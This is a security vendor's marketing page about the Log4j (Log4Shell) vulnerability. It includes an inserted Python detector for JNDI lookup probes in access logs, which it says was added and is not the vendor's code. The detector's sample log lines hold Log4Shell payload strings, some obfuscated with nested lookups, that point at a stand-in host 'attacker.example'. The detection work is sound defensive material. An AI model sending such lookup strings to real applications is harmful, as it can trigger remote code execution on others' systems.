Apache Log4j Vulnerability

What You Need to Know

Apache Log4j – What Is It?

Apache Log4j is a widely used Java logging library used for performance and security information. It is broadly deployed in many different consumer and enterprise services, websites and applications.

Apache Log4j Vulnerability Exploits Are Serious

“This vulnerability, which is being widely exploited by a growing set of threat actors, presents an urgent challenge to network defenders given its broad use… We have added this vulnerability to our catalog of known exploited vulnerabilities, which compels federal civilian agencies -- and signals to non-federal partners -- to urgently patch or remediate this vulnerability… To be clear, this vulnerability poses a severe risk.”1
—Jen Easterly
CISA Director

Want to Learn More?

We are ready to help you with Log4j and any other cybersecurity challenges you may have. Download the “Trinity Cyber and Apache Log4j: Stay Secure Before, During and After Patching” white paper below for more details and information.


Recently, a critical remote code execution (RCE) vulnerability (CVE-2021-44228) in Apache’s Log4j 2 software library was publicly disclosed. This flaw, sometimes called “Logjam” or “Log4Shell”, gives attackers the ability to execute arbitrary code on any impacted system by sending crafted input that the application passes to Log4j for logging, potentially allowing them to take control of the affected system. Hackers launched over 840,000 attacks on companies globally within the first few days of the vulnerability becoming public.2

New variants and additional flaws are continually being discovered in the wild. For instance, according to an Apache.org security advisory, the newly identified CVE-2021-45046 could enable attackers to craft malicious input data that results in a Denial-of-Service (DoS) condition in certain non-default configurations. We expect, and are actively watching for, additional Log4j variants.
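The attacks described above arrive as lookup strings embedded in whatever a vulnerable application logs (User-Agent headers, URL paths, form fields), and scanners routinely nest extra lookups around them so that a naive substring match on the lookup prefix misses them. The following detector is an added example and is not Trinity Cyber’s code or any part of its product: it folds the common nesting tricks back to the canonical form the same way the library would at runtime, then flags any log line that still contains a JNDI lookup. The sample log lines and the `attacker.example` host name are constructed for the example.

```python
import re

# Constructed sample access-log lines (not from the page): one plain lookup,
# two disguised with nested lookups, and one benign User-Agent.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.6 - - "GET / HTTP/1.1" 200 '
    '"${${lower:j}${lower:n}di:${lower:l}dap://attacker.example/a}"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "Mozilla/5.0 (compatible)"',
    '10.0.0.8 - - "GET / HTTP/1.1" 200 "${${::-j}ndi:rmi://attacker.example/a}"',
]

# Matches an innermost ${...} lookup (one that contains no further lookup).
_INNER = re.compile(r'\$\{([^${}]*)\}')


def _resolve(inner: str) -> str:
    """Evaluate one innermost lookup the way the logger would at runtime."""
    if ':-' in inner:                      # ${anything:-default} -> default
        return inner.split(':-', 1)[1]
    prefix, sep, rest = inner.partition(':')
    if sep and prefix.lower() == 'lower':  # ${lower:x} -> x
        return rest.lower()
    if sep and prefix.lower() == 'upper':  # ${upper:x} -> X
        return rest.upper()
    return '${' + inner + '}'              # unknown lookup: leave untouched


def normalize(text: str) -> str:
    """Collapse nested lookups from the inside out until nothing changes."""
    while True:
        folded = _INNER.sub(lambda m: _resolve(m.group(1)), text)
        if folded == text:
            return text
        text = folded


# After normalisation, the probe reduces to a bare JNDI lookup prefix.
_JNDI = re.compile(r'\$\{\s*jndi\s*:', re.IGNORECASE)


def is_log4shell_probe(line: str) -> bool:
    """True if the line contains a JNDI lookup once obfuscation is folded."""
    return bool(_JNDI.search(normalize(line)))


def scan(lines):
    """Return the subset of log lines that carry a JNDI lookup."""
    return [line for line in lines if is_log4shell_probe(line)]
```

Run over a real access log, the same `scan()` call gives a quick first-pass triage list; a hit means the request reached an application that may have logged it, not that exploitation succeeded.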

Trinity Cyber’s Core Tech is NOT Vulnerable to Log4j Exploits

Trinity Cyber’s technology does not employ the affected library in our systems, so customer data is not vulnerable to Log4j exploitation. For our customers, we immediately deployed automated protections and hunting capabilities. Inbound network sessions containing Log4j exploits are automatically dropped, while our discovery efforts continuously find new delivery methods and obfuscation techniques.


Creating Time for an Orderly Log4j Patch Cycle

While others were scrambling to monitor and patch critical systems, Trinity Cyber customers were protected from any attempt to exploit the Log4j vulnerability. Our technologies were tuned within the first few hours to detect and drop scanning and exploit attempts (even obfuscated ones) in network traffic. As a result, Trinity Cyber customers are now conducting a methodical, scheduled and managed patch process. Their systems and reputations were protected and secured by Trinity Cyber. This is another example of why our breakthrough technology’s ability to see more, do more and stop more is simply better with our innovative, contextual approach.

Trinity Cyber

Core Premise

The premise of Trinity Cyber’s technology is simple and unique.

Every Internet session can and should be fully staged, parsed and deeply inspected inline (not in a sandbox) in context, and with endpoint and application layer fidelity before it enters or leaves a customer’s control. At the same time, automated processes must be run to remove or alter malicious content from files and protocol fields at speed and scale to affect the outcome in favor of the customer. This must be done without introducing latency or degrading the customer’s Internet experience.

© 2020 Trinity Cyber, Inc. All Rights Reserved.